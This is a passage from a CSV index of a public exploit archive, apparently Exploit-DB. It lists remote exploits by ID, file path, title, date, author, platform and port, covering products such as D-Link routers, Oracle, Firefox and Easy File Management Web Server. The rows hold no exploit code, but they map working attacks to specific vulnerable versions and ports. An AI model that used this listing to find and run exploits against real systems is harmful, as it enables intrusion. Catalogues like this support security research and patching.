Overflow (Metasploit)",2014-05-12,Metasploit,remote,windows, +33363,exploits/multiple/remote/33363.txt,"Opera Web Browser 10.01 - 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",remote,multiple, +33364,exploits/linux/remote/33364.txt,"KDE 4.3.3 - KDELibs 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",remote,linux, +33379,exploits/multiple/remote/33379.txt,"Apache Tomcat 3.2 - 404 Error Page Cross-Site Scripting",2009-09-02,MustLive,remote,multiple, +33388,exploits/linux/remote/33388.f,"Xfig and Transfig 3.2.5 - '.fig' Remote Buffer Overflow",2009-12-03,pedamachephepto,remote,linux, +33399,exploits/multiple/remote/33399.txt,"Oracle E-Business Suite 11i - Multiple Remote Vulnerabilities",2009-12-14,Hacktics,remote,multiple, +41805,exploits/hardware/remote/41805.txt,"Broadcom Wi-Fi SoC - TDLS Teardown Request Remote Heap Overflow",2017-04-04,"Google Security Research",remote,hardware, +33453,exploits/windows/remote/33453.py,"Easy File Management Web Server 5.3 - Remote Stack Buffer Overflow",2014-05-21,superkojiman,remote,windows, +33454,exploits/windows/remote/33454.py,"Easy Address Book Web Server 1.6 - Remote Stack Buffer Overflow",2014-05-21,superkojiman,remote,windows, +33471,exploits/hardware/remote/33471.txt,"D-Link DKVM-IP8 - 'auth.asp' Cross-Site Scripting",2010-01-06,POPCORN,remote,hardware, +40344,exploits/php/remote/40344.rb,"SugarCRM 6.5.23 - REST PHP Object Injection (Metasploit)",2016-09-07,"Egidio Romano",remote,php,80 +33489,exploits/multiple/remote/33489.txt,"Ruby 1.9.1 - WEBrick 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,remote,multiple, +33490,exploits/multiple/remote/33490.txt,"Nginx 0.7.64 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,remote,multiple, +33497,exploits/multiple/remote/33497.txt,"AOLServer Terminal 4.5.1 - Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,remote,multiple, +33498,exploits/multiple/remote/33498.txt,"Varnish 2.0.6 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,remote,multiple, +33499,exploits/multiple/remote/33499.txt,"thttpd 2.24 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,remote,multiple, +33500,exploits/multiple/remote/33500.txt,"mini_httpd 1.18 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,remote,multiple, +33501,exploits/windows/remote/33501.txt,"Cherokee 0.99.30 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,remote,windows, +33502,exploits/windows/remote/33502.txt,"Yaws 1.55 - 'Logs' Terminal Escape Sequence Command Injection",2010-01-11,evilaliv3,remote,windows, +33503,exploits/multiple/remote/33503.txt,"Orion Application Server 2.0.7 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,remote,multiple, +33504,exploits/multiple/remote/33504.txt,"BOA Web Server 0.94.x - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,remote,multiple, +33521,exploits/multiple/remote/33521.rb,"Symantec Workspace Streaming - Arbitrary File Upload (Metasploit)",2014-05-26,Metasploit,remote,multiple,9855 +33611,exploits/windows/remote/33611.txt,"GeFest Web Home Server 1.0 - Directory Traversal",2010-02-08,Markot,remote,windows, +33525,exploits/php/remote/33525.txt,"Zend Framework 1.9.6 - Multiple Input Validation Vulnerabilities / Security Bypass",2010-01-14,"draic Brady",remote,php, +33535,exploits/linux/remote/33535.txt,"SystemTap 1.0 - 'stat-server' Arbitrary Command Injection",2010-01-15,"Frank Ch. Eigler",remote,linux, +33536,exploits/multiple/remote/33536.txt,"Zenoss 2.3.3 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-01-18,"Adam Baldwin",remote,multiple, +33538,exploits/windows/remote/33538.py,"Easy File Sharing FTP Server 3.5 - Remote Stack Buffer Overflow",2014-05-27,superkojiman,remote,windows,21 +33540,exploits/windows/remote/33540.txt,"SurgeFTP 2.x - 'surgeftpmgr.cgi' Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,indoushka,remote,windows, +33552,exploits/windows/remote/33552.txt,"Microsoft Internet Explorer 8 - URI Validation Remote Code Execution",2010-01-21,"Lostmon Lords",remote,windows, +33553,exploits/multiple/remote/33553.txt,"Sun Java System Web Server 6.1/7.0 - Digest Authentication Remote Buffer Overflow",2010-01-21,Intevydis,remote,multiple, +33554,exploits/linux/remote/33554.py,"TORQUE Resource Manager 2.5.x < 2.5.13 - Stack Based Buffer Overflow Stub",2014-05-28,bwall,remote,linux, +33562,exploits/multiple/remote/33562.html,"Google Chrome 3.0 - Style Sheet redirection Information Disclosure",2010-01-22,"Cesar Cerrudo",remote,multiple, +33563,exploits/windows/remote/33563.txt,"Apple Safari 4.0.4 - Style Sheet redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",remote,windows, +33567,exploits/hardware/remote/33567.txt,"Cisco Secure Desktop 3.x - 'translation' Cross-Site Scripting",2010-01-26,"Matias Pablo Brutti",remote,hardware, +33568,exploits/hardware/remote/33568.txt,"Novatel Wireless MiFi 2352 - Password Information Disclosure",2010-01-17,"Alejandro Ramos",remote,hardware, +33569,exploits/multiple/remote/33569.txt,"HP System Management Homepage 3.0.2 - 'servercert' Cross-Site Scripting",2010-01-27,"Richard Brain",remote,multiple, +33570,exploits/multiple/remote/33570.txt,"SAP BusinessObjects 12 - URI redirection / Cross-Site Scripting",2010-01-27,"Richard Brain",remote,multiple, +33588,exploits/java/remote/33588.rb,"ElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit)",2014-05-30,Metasploit,remote,java,9200 +33598,exploits/linux/remote/33598.rb,"Samba 3.4.5 - Symlink Directory Traversal (Metasploit)",2010-02-04,kingcope,remote,linux, +33599,exploits/linux/remote/33599.txt,"Samba 3.4.5 - Symlink Directory Traversal",2010-02-04,kingcope,remote,linux, +33600,exploits/multiple/remote/33600.rb,"Oracle 10g - Multiple Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",remote,multiple, +33601,exploits/multiple/remote/33601.rb,"Oracle 11g - Multiple Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",remote,multiple, +33610,exploits/windows/remote/33610.py,"Easy File Management Web Server 5.3 - 'UserID' Remote Buffer Overflow (ROP)",2014-06-01,"Julien Ahrens",remote,windows,80 +33615,exploits/multiple/remote/33615.txt,"JDownloader - 'JDExternInterface.java' Remote Code Execution",2010-02-08,apoc,remote,multiple, +33616,exploits/multiple/remote/33616.txt,"Mongoose 2.8 - Space String Remote File Disclosure",2010-02-08,"Pouya Daneshmand",remote,multiple, +33620,exploits/linux/remote/33620.txt,"Helix Player 11.0.2 - Encoded URI Processing Buffer Overflow",2007-07-03,gwright,remote,linux, +33622,exploits/linux/remote/33622.txt,"Accellion File Transfer - 'Appliance web_client_user_guide.html?lang' Traversal Arbitrary File Access",2010-02-10,"Tim Brown",remote,linux, +33642,exploits/windows/remote/33642.html,"Symantec (Multiple Products) - Client Proxy ActiveX 'CLIproxy.dll' Remote Overflow",2010-02-17,"Alexander Polyakov",remote,windows, +33648,exploits/hardware/remote/33648.txt,"Huawei HG510 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-16,"Ivan Markovic",remote,hardware, +33653,exploits/multiple/remote/33653.txt,"PortWise SSL VPN 4.6 - 'reloadFrame' Cross-Site Scripting",2010-02-18,"George Christopoulos",remote,multiple, +33662,exploits/windows/remote/33662.txt,"WampServer 2.0i - 'lang' Cross-Site Scripting",2010-02-22,"Gjoko Krstic",remote,windows, +33663,exploits/multiple/remote/33663.txt,"IBM Websphere Portal 6.0.1.5 Build wp6015 - Portlet Palette Search HTML Injection",2010-02-19,"Sjoerd Resink",remote,multiple, +33664,exploits/multiple/remote/33664.html,"Mozilla Firefox 3.5.8 - Style Sheet redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",remote,multiple, +33682,exploits/multiple/remote/33682.txt,"Oracle Siebel 7.7/7.8 - '/loyalty_enu/start.swe' Cross-Site Scripting",2010-03-01,Lament,remote,multiple, +33686,exploits/multiple/remote/33686.txt,"IBM Lotus Domino 7.0.2 - 'readme.nsf' Cross-Site Scripting",2010-03-02,"Nahuel Grisolia",remote,multiple, +33689,exploits/multiple/remote/33689.as,"Adobe Flash Player 10.1.51 - Local File Access Information Disclosure",2010-03-03,"lis cker",remote,multiple, +33705,exploits/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",remote,windows, +33712,exploits/windows/remote/33712.txt,"VideoLAN VLC Media Player 1.0.x - Bookmark Creation Buffer Overflow",2010-03-05,"Gjoko Krstic",remote,windows, +33739,exploits/hardware/remote/33739.txt,"Yealink VoIP Phone SIP-T38G - Default Credentials",2014-06-13,Mr.Un1k0d3r,remote,hardware, +33741,exploits/hardware/remote/33741.txt,"Yealink VoIP Phone SIP-T38G - Remote Command Execution",2014-06-13,Mr.Un1k0d3r,remote,hardware, +33742,exploits/hardware/remote/33742.txt,"Yealink VoIP Phone SIP-T38G - Privilege Escalation",2014-06-13,Mr.Un1k0d3r,remote,hardware, +33750,exploits/windows/remote/33750.txt,"Microsoft Windows XP/2000 - Help File Relative Path Remote Command Execution",2010-03-06,Secumania,remote,windows, +33752,exploits/linux/remote/33752.html,"WebKit 1.2.x - Right-to-Left Displayed Text Handling Memory Corruption",2010-03-11,wushi,remote,linux, +33767,exploits/novell/remote/33767.rb,"Novell eDirectory 8.8.5 - DHost Weak Session Cookie Session Hijacking (Metasploit)",2010-03-14,Metasploit,remote,novell, +33774,exploits/multiple/remote/33774.txt,"IBM Lotus Notes 6.5.6 - 'names.nsf' Open Redirection",2010-03-19,Lament,remote,multiple, +33780,exploits/multiple/remote/33780.txt,"IBM Lotus Notes 6.5.x - 'names.nsf' Cross-Site Scripting",2010-03-19,Lament,remote,multiple, +33783,exploits/linux/remote/33783.txt,"Astaro Security Linux 5 - 'index.fpl' Cross-Site Scripting",2010-03-23,"Vincent Hautot",remote,linux, +33786,exploits/multiple/remote/33786.txt,"Cafu 9.06 - Multiple Remote Vulnerabilities",2010-03-23,"Luigi Auriemma",remote,multiple, +33789,exploits/multiple/remote/33789.rb,"Java - Debug Wire Protocol Remote Code Execution (Metasploit)",2014-06-17,Metasploit,remote,multiple,8000 +33790,exploits/windows/remote/33790.rb,"Easy File Management Web Server - Remote Stack Buffer Overflow (Metasploit)",2014-06-17,Metasploit,remote,windows,80 +33798,exploits/linux/remote/33798.html,"Mozilla Firefox 3.6 - Image Preloading Content-Policy Check Security Bypass",2010-03-18,"Josh Soref",remote,linux, +33802,exploits/multiple/remote/33802.txt,"Jenkins Software RakNet 3.72 - Remote Integer Underflow",2010-03-25,"Luigi Auriemma",remote,multiple, +33805,exploits/linux/remote/33805.pl,"Alienvault Open Source SIEM (OSSIM) < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution",2014-06-18,"Alfredo Ramirez",remote,linux, +33807,exploits/multiple/remote/33807.rb,"Rocket Servergraph Admin Center - fileRequestor Remote Code Execution (Metasploit)",2014-06-18,Metasploit,remote,multiple,8888 +33810,exploits/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch - 'Throw' Exception Remote Code Execution",2010-03-26,"Nishant Das Patnaik",remote,osx, +33811,exploits/osx/remote/33811.html,"Apple Safari iPhone/iPod touch - Webpage Remote Code Execution",2010-03-26,"Nishant Das Patnaik",remote,osx, +33816,exploits/multiple/remote/33816.pl,"Miranda IM 0.8.16 - Information Disclosure",2010-04-06,"Jan Schejbal",remote,multiple, +33817,exploits/windows/remote/33817.rb,"Ericom AccessNow Server - Remote Buffer Overflow (Metasploit)",2014-06-19,Metasploit,remote,windows,8080 +33852,exploits/windows/remote/33852.txt,"HTTP 1.1 - GET Directory Traversal",2010-06-20,chr1x,remote,windows, +33826,exploits/linux/remote/33826.txt,"TCPDF 4.5.036/4.9.5 - 'params' Attribute Remote Code Execution",2010-04-08,apoc,remote,linux, +33829,exploits/windows/remote/33829.c,"WinSoftMagic Photo Editor - '.png' Remote Buffer Overflow",2010-04-09,eidelweiss,remote,windows, +33839,exploits/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 - 'jtfwcpnt.jsp' SQL Injection",2010-04-15,"Joxean Koret",remote,multiple, +33841,exploits/windows/remote/33841.txt,"HTTP File Server 2.2 - Security Bypass / Denial of Service",2010-04-19,"Luigi Auriemma",remote,windows, +33880,exploits/windows/remote/33880.rb,"Cogent DataHub - Command Injection (Metasploit)",2014-06-25,Metasploit,remote,windows, +33847,exploits/multiple/remote/33847.txt,"netkar-PRO 1.1 - Remote Stack Buffer Overflow",2010-04-13,"Luigi Auriemma",remote,multiple, +33848,exploits/windows/remote/33848.py,"WinMount 3.3.401 - '.zip' Remote Buffer Overflow",2010-04-19,lilf,remote,windows, +33868,exploits/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure",2010-04-22,"Veerendra G.G",remote,multiple, +33855,exploits/linux/remote/33855.txt,"MIT Kerberos 5 - 'src/kdc/do_tgs_req.c' Ticket Renewal Double-Free Memory Corruption",2010-04-20,"Joel Johnson",remote,linux, +34143,exploits/windows/remote/34143.txt,"XnView 1.97.4 - '.MBM' File Remote Heap Buffer Overflow",2010-06-14,"Mauro Olea",remote,windows, +33862,exploits/hardware/remote/33862.rb,"D-Link Devices - 'Authentication.cgi' Remote Buffer Overflow (Metasploit)",2014-06-24,Metasploit,remote,hardware,80 +33863,exploits/hardware/remote/33863.rb,"D-Link Devices - 'hedwig.cgi' Remote Buffer Overflow in Cookie Header (Metasploit)",2014-06-24,Metasploit,remote,hardware,80 +33865,exploits/linux/remote/33865.rb,"Alienvault Open Source SIEM (OSSIM) - av-centerd Command Injection (Metasploit)",2014-06-24,Metasploit,remote,linux,40007 +33869,exploits/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure",2010-04-22,hkm,remote,hardware, +33871,exploits/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 - Multiple Input Validation Vulnerabilities",2010-04-08,cp77fk4r,remote,multiple, +33873,exploits/multiple/remote/33873.txt,"HP System Management Homepage - 'RedirectUrl' Open Redirection",2010-04-25,"Aung Khant",remote,multiple, +33877,exploits/multiple/remote/33877.c,"NovaSTOR NovaNET 12.0 - Remote Command Execution",2007-09-25,mu-b,remote,multiple, +33878,exploits/multiple/remote/33878.c,"NovaSTOR NovaNET 12.0 - Remote SYSTEM",2007-09-25,mu-b,remote,multiple, +33890,exploits/windows/remote/33890.txt,"OneHTTPD 0.6 - Directory Traversal",2010-04-27,"John Leitch",remote,windows, +33891,exploits/java/remote/33891.rb,"HP AutoPass License Server - Arbitrary File Upload (Metasploit)",2014-06-27,Metasploit,remote,java,5814 +33900,exploits/windows/remote/33900.pl,"Serenity Audio Player 3.2.3 - '.m3u' Remote Buffer Overflow",2010-04-26,Madjix,remote,windows, +33901,exploits/windows/remote/33901.rb,"Serenity Audio Player 3.2.3 - '.m3u' Remote Buffer Overflow (Metasploit)",2010-04-26,blake,remote,windows, +33905,exploits/multiple/remote/33905.txt,"Apache ActiveMQ 5.3 - 'admin/queueBrowse' Cross-Site Scripting",2010-04-28,"arun kethipelly",remote,multiple, +33907,exploits/multiple/remote/33907.txt,"ZKSoftware 'ZK5000' - Remote Information Disclosure",2010-03-20,fb1h2s,remote,multiple, +33962,exploits/hardware/remote/33962.txt,"Cisco Application Control Engine (ACE) - HTTP Parsing Security",2010-05-07,"Alexis Tremblay",remote,hardware, +33964,exploits/windows/remote/33964.txt,"X-Motor Racing 1.26 - Remote Buffer Overflow / Multiple Denial of Service Vulnerabilities",2010-05-06,"Luigi Auriemma",remote,windows, +33971,exploits/windows/remote/33971.c,"Rebellion Aliens vs Predator 2.22 - Multiple Memory Corruption Vulnerabilities",2010-05-07,"Luigi Auriemma",remote,windows, +33920,exploits/php/remote/33920.php,"PHP 5.3 - 'PHP_dechunk()' HTTP Chunked Encoding Integer Overflow",2010-05-02,"Stefan Esser",remote,php, +33988,exploits/php/remote/33988.txt,"PHP 5.3.x < 5.3.2 - 'ext/phar/stream.c' / 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",remote,php, +33989,exploits/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet - Arbitrary File Upload (Metasploit)",2014-07-07,Metasploit,remote,windows,9002 +33929,exploits/multiple/remote/33929.py,"Gitlist 0.4.0 - Remote Code Execution",2014-06-30,drone,remote,multiple, +33935,exploits/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Unauthorized Access",2010-02-24,nks,remote,windows, +33938,exploits/hardware/remote/33938.txt,"Sterlite SAM300 AX Router - 'Stat_Radio' Cross-Site Scripting",2010-02-04,"Karn Ganeshen",remote,hardware, +33940,exploits/multiple/remote/33940.txt,"VMware View 3.1.x - URL Processing Cross-Site Scripting",2010-05-05,"Alexey Sintsov",remote,multiple, +33941,exploits/windows/remote/33941.html,"TVUPlayer 2.4.4.9beta1 - 'PlayerOcx.ocx' ActiveX Control Arbitrary File Overwrite",2010-02-03,"Evdokimov Dmitriy",remote,windows, +33944,exploits/windows/remote/33944.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 4.1.x Bypass) (MS12-037)",2014-07-01,sickness,remote,windows, +33949,exploits/linux/remote/33949.txt,"PCRE 6.2 - Regular Expression Compiling Workspace Buffer Overflow",2010-05-06,"Michael Santos",remote,linux, +33974,exploits/windows/remote/33974.txt,"Mereo 1.9.1 - Directory Traversal",2010-05-09,"John Leitch",remote,windows, +33980,exploits/windows/remote/33980.txt,"Best Way GEM Engine - Multiple Vulnerabilities",2009-10-12,"Luigi Auriemma",remote,windows, +33981,exploits/windows/remote/33981.txt,"GameCore 2.5 - 'GameID' Integer Overflow",2010-05-13,"Luigi Auriemma",remote,windows, +33990,exploits/multiple/remote/33990.rb,"Gitlist - Unauthenticated Remote Command Execution (Metasploit)",2014-07-07,Metasploit,remote,multiple,80 +33991,exploits/php/remote/33991.rb,"WordPress Plugin MailPoet Newsletters 2.6.8 - 'wysija-newsletters' Unauthenticated Arbitrary File Upload (Metasploit)",2014-07-07,Metasploit,remote,php,80 +34002,exploits/windows/remote/34002.c,"TeamViewer 5.0.8232 - Remote Buffer Overflow",2010-05-18,"fl0 fl0w",remote,windows, +34009,exploits/windows/remote/34009.rb,"Yokogawa CS3000 - 'BKFSim_vhfd.exe' Remote Buffer Overflow (Metasploit)",2014-07-08,Metasploit,remote,windows,20010 +34013,exploits/windows/remote/34013.txt,"McAfee Email Gateway 6.7.1 - 'systemWebAdminConfig.do' Remote Security Bypass",2010-05-19,"Nahuel Grisolia",remote,windows, +34018,exploits/hardware/remote/34018.txt,"U.S.Robotics USR5463 0.06 Firmware - 'setup_ddns.exe' HTML Injection",2010-05-20,SH4V,remote,hardware, +34026,exploits/linux/remote/34026.py,"OpenVAS Manager 4.0 - Authentication Bypass (PoC)",2014-07-10,EccE,remote,linux, +34033,exploits/hardware/remote/34033.html,"Cisco DPC2100 2.0.2 r1256-060303 - Multiple Security Bypass / Cross-Site Request Forgery Vulnerabilities",2010-05-24,"Dan Rosenberg",remote,hardware, +34047,exploits/windows/remote/34047.html,"Home FTP Server 1.10.3 (build 144) - Cross-Site Request Forgery",2010-05-26,"John Leitch",remote,windows, +34048,exploits/multiple/remote/34048.html,"Brekeke PBX 2.4.4.8 - 'pbx/gate' Cross-Site Request Forgery",2010-05-26,"John Leitch",remote,multiple, +34050,exploits/windows/remote/34050.py,"Home FTP Server 1.10.2.143 - Directory Traversal",2010-05-27,"John Leitch",remote,windows, +34059,exploits/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET (SEH)",2014-07-14,"Revin Hadi Saputra",remote,windows, +34063,exploits/hardware/remote/34063.rb,"D-Link Devices - 'info.cgi' POST Buffer Overflow (Metasploit)",2014-07-14,Metasploit,remote,hardware,80 +34064,exploits/hardware/remote/34064.rb,"D-Link HNAP - Request Remote Buffer Overflow (Metasploit)",2014-07-14,Metasploit,remote,hardware,80 +34065,exploits/hardware/remote/34065.rb,"D-Link Devices - Unauthenticated UPnP M-SEARCH Multicast Command Injection (Metasploit)",2014-07-14,Metasploit,remote,hardware,1900 +34066,exploits/windows/remote/34066.py,"HP Data Protector Manager 8.10 - Remote Command Execution",2014-07-14,Polunchis,remote,windows, +34088,exploits/android/remote/34088.html,"Boat Browser 8.0/8.0.1 - Remote Code Execution",2014-07-16,c0otlass,remote,android, +34156,exploits/windows/remote/34156.pl,"TurboFTP Server 1.20.745 - Directory Traversal",2010-06-17,leinakesi,remote,windows, +34115,exploits/windows/remote/34115.txt,"McAfee Unified Threat Management Firewall 4.0.6 - 'page' Cross-Site Scripting",2010-06-07,"Adam Baldwin",remote,windows, +34126,exploits/windows/remote/34126.txt,"Microsoft Help and Support Center - '/sysinfo/sysinfomain.htm' Cross-Site Scripting",2010-06-10,"Tavis Ormandy",remote,windows, +34132,exploits/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",remote,php,443 +34152,exploits/linux/remote/34152.txt,"CUPS 1.4.2 - Web Interface Information Disclosure",2010-06-15,"Luca Carettoni",remote,linux, +34160,exploits/php/remote/34160.txt,"Omeka 2.2.1 - Remote Code Execution",2014-07-24,LiquidWorm,remote,php,80 +34363,exploits/multiple/remote/34363.rb,"Mozilla Firefox - toString console.time Privileged JavaScript Injection (Metasploit)",2014-08-19,Metasploit,remote,multiple, +34174,exploits/windows/remote/34174.txt,"Enemy Territory: Quake Wars 1.5.12642.33243 - Remote Buffer Overflow",2010-08-18,"Luigi Auriemma",remote,windows, +34178,exploits/windows/remote/34178.txt,"id Software id Tech 4 Engine - 'idGameLocal::GetGameStateObject()' Remote Code Execution",2010-07-21,"Luigi Auriemma",remote,windows, +34182,exploits/hardware/remote/34182.txt,"Linksys WAP54Gv3 Wireless Router - 'debug.cgi' Cross-Site Scripting",2010-06-23,"Cristofaro Mune",remote,hardware, +34184,exploits/hardware/remote/34184.txt,"Trend Micro Interscan Web Security Virtual Appliance - Multiple Vulnerabilities",2010-06-14,"Ivan Huertas",remote,hardware, +34186,exploits/multiple/remote/34186.txt,"Apache Axis2 1.x - '/axis2/axis2-admin' Session Fixation",2010-06-23,"Tiago Ferreira Barbosa",remote,multiple, +34191,exploits/php/remote/34191.py,"Oxwall 1.7.0 - Remote Code Execution",2014-07-28,LiquidWorm,remote,php,80 +34192,exploits/linux/remote/34192.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - XSLT Integer Overflow",2010-06-22,"Martin Barbella",remote,linux, +34200,exploits/hardware/remote/34200.txt,"Cisco Adaptive Security Response - HTTP Response Splitting",2010-06-25,"Daniel King",remote,hardware, +34201,exploits/linux/remote/34201.txt,"feh 1.7 - '--wget-Timestamp' Remote Code Execution",2010-06-25,anonymous,remote,linux, +34208,exploits/hardware/remote/34208.txt,"D-Link DAP-1160 Wireless Access Point - DCC Protocol Security Bypass",2010-06-28,"Cristofaro Mune",remote,hardware, +34230,exploits/windows/remote/34230.txt,"Freewebscriptz Online Games Login - Multiple SQL Injections",2009-12-31,"Hussin X",remote,windows, +34362,exploits/linux/remote/34362.rb,"Gitlab-shell - Code Execution (Metasploit)",2014-08-19,Metasploit,remote,linux,443 +34271,exploits/multiple/remote/34271.txt,"id Software id Tech 4 Engine - 'key' Packet Remote Code Execution",2010-07-05,"Luigi Auriemma",remote,multiple, +34297,exploits/multiple/remote/34297.txt,"dotDefender - Cross-Site Scripting Security Bypass",2010-07-09,SH4V,remote,multiple, +34301,exploits/multiple/remote/34301.txt,"Asterisk Recording Interface 0.7.15/0.10 - Multiple Vulnerabilities",2010-07-12,TurboBorland,remote,multiple, +34310,exploits/multiple/remote/34310.txt,"Oracle Business Process Management 10.3.2 - Cross-Site Scripting",2010-07-13,Markot,remote,multiple, +34312,exploits/multiple/remote/34312.txt,"Oracle WebLogic Server 10.3.3 - Encoded URL",2010-07-13,"Timothy D. Morgan",remote,multiple, +34316,exploits/hardware/remote/34316.txt,"Juniper Networks SA2000 SSL VPN Appliance - 'welcome.cgi' Cross-Site Scripting",2010-06-09,"Richard Brain",remote,hardware, +34335,exploits/linux/remote/34335.rb,"VMTurbo Operations Manager 4.6 - 'vmtadmin.cgi' Remote Command Execution (Metasploit)",2014-08-14,Metasploit,remote,linux,80 +34334,exploits/win_x86-64/remote/34334.rb,"Oracle VM VirtualBox 4.3.6 - 3D Acceleration Virtual Machine Escape (Metasploit)",2014-08-14,Metasploit,remote,win_x86-64, +34594,exploits/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate - Arbitrary File Upload (Metasploit)",2014-09-09,Metasploit,remote,windows,8020 +34358,exploits/linux/remote/34358.txt,"Mozilla Firefox and SeaMonkey Plugin Parameters - Remote Buffer Overflow",2010-07-20,J23,remote,linux, +34369,exploits/multiple/remote/34369.txt,"IBM Java - UTF8 Byte Sequences Security Bypass",2010-07-23,IBM,remote,multiple, +34372,exploits/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection",2009-11-01,"Davide Canali",remote,multiple, +34465,exploits/hardware/remote/34465.txt,"F5 Big-IP - Unauthenticated rsync Access",2014-08-29,Security-Assessment.com,remote,hardware,22 +34385,exploits/linux/remote/34385.txt,"KVIrc 4.0 - '\r' Carriage Return in DCC Handshake Remote Command Execution",2010-07-28,unic0rn,remote,linux, +34390,exploits/php/remote/34390.rb,"HybridAuth - 'install.php' PHP Code Execution (Metasploit)",2014-08-21,Metasploit,remote,php,80 +34399,exploits/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",remote,ios, +34426,exploits/linux/remote/34426.txt,"uzbl 'uzbl-core' - '@SELECTED_URI' Mouse Button Bindings Command Injection",2010-08-05,Chuzz,remote,linux, +34431,exploits/linux/remote/34431.html,"Nagios XI - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",remote,linux, +34437,exploits/windows/remote/34437.txt,"Portable Document Format - Specification Signature Collision",2010-08-11,"Florian Zumbiehl",remote,windows, +34439,exploits/multiple/remote/34439.txt,"ServletExec - Directory Traversal / Authentication Bypass",2010-08-12,"Stefano Di Paola",remote,multiple, +34448,exploits/multiple/remote/34448.rb,"Mozilla Firefox - WebIDL Privileged JavaScript Injection (Metasploit)",2014-08-28,Metasploit,remote,multiple, +34461,exploits/multiple/remote/34461.py,"NRPE 2.15 - Remote Code Execution",2014-08-29,"Claudio Viviani",remote,multiple, +34462,exploits/windows/remote/34462.txt,"Microsoft Windows Kerberos - 'Pass The Ticket' Replay Security Bypass",2010-08-13,"Emmanuel Bouillon",remote,windows, +34478,exploits/windows/remote/34478.html,"Microsoft Internet Explorer 8 - 'toStaticHTML()' HTML Sanitization Bypass",2010-08-16,"Mario Heiderich",remote,windows, +40339,exploits/linux/remote/40339.py,"glibc - 'getaddrinfo' Stack Based Buffer Overflow",2016-09-06,SpeeDr00t,remote,linux, +34500,exploits/multiple/remote/34500.html,"Flock Browser 3.0.0 - Malformed Bookmark HTML Injection",2010-08-19,Lostmon,remote,multiple, +34507,exploits/linux/remote/34507.txt,"Nagios XI - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",remote,linux, +34517,exploits/windows/remote/34517.rb,"Wing FTP Server - Authenticated Command Execution (Metasploit)",2014-09-01,Metasploit,remote,windows,5466 +34523,exploits/multiple/remote/34523.txt,"Nagios XI - 'users.php' SQL Injection",2010-08-24,"Adam Baldwin",remote,multiple, +34532,exploits/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Executions",2010-08-25,storm,remote,windows, +34542,exploits/windows/remote/34542.c,"UltraVNC 1.0.8.2 - DLL Loading Arbitrary Code Execution",2010-08-30,"Ivan Markovic",remote,windows, +34595,exploits/linux/remote/34595.py,"ALCASAR 2.8 - Remote Code Execution",2014-09-09,eF,remote,linux,80 +34621,exploits/unix/remote/34621.c,"Mozilla Firefox 3.6.8 - 'Math.random()' Cross Domain Information Disclosure",2010-09-14,"Amit Klein",remote,unix, +34622,exploits/windows/remote/34622.txt,"Axigen Webmail 1.0.1 - Directory Traversal",2010-09-15,"Bogdan Calin",remote,windows, +34647,exploits/windows/remote/34647.txt,"Ammyy Admin 3.5 - Remote Code Execution (Metasploit)",2014-09-13,scriptjunkie,remote,windows, +34654,exploits/windows/remote/34654.c,"SWiSH Max3 - DLL Loading Arbitrary Code Execution",2010-09-20,anT!-Tr0J4n,remote,windows, +34668,exploits/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",remote,windows,80 +34669,exploits/multiple/remote/34669.rb,"Railo 4.2.1 - Remote File Inclusion (Metasploit)",2014-09-15,Metasploit,remote,multiple,80 +34670,exploits/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer - Arbitrary File Upload (Metasploit)",2014-09-15,Metasploit,remote,multiple,8400 +34671,exploits/java/remote/34671.rb,"SolarWinds Storage Manager - Authentication Bypass (Metasploit)",2014-09-15,Metasploit,remote,java,9000 +34685,exploits/windows/remote/34685.py,"Basic Web Server 1.0 - Directory Traversal / Denial of Service",2010-09-19,"John Leitch",remote,windows, +34686,exploits/windows/remote/34686.txt,"YelloSoft Pinky 1.0 - Directory Traversal",2010-09-16,"John 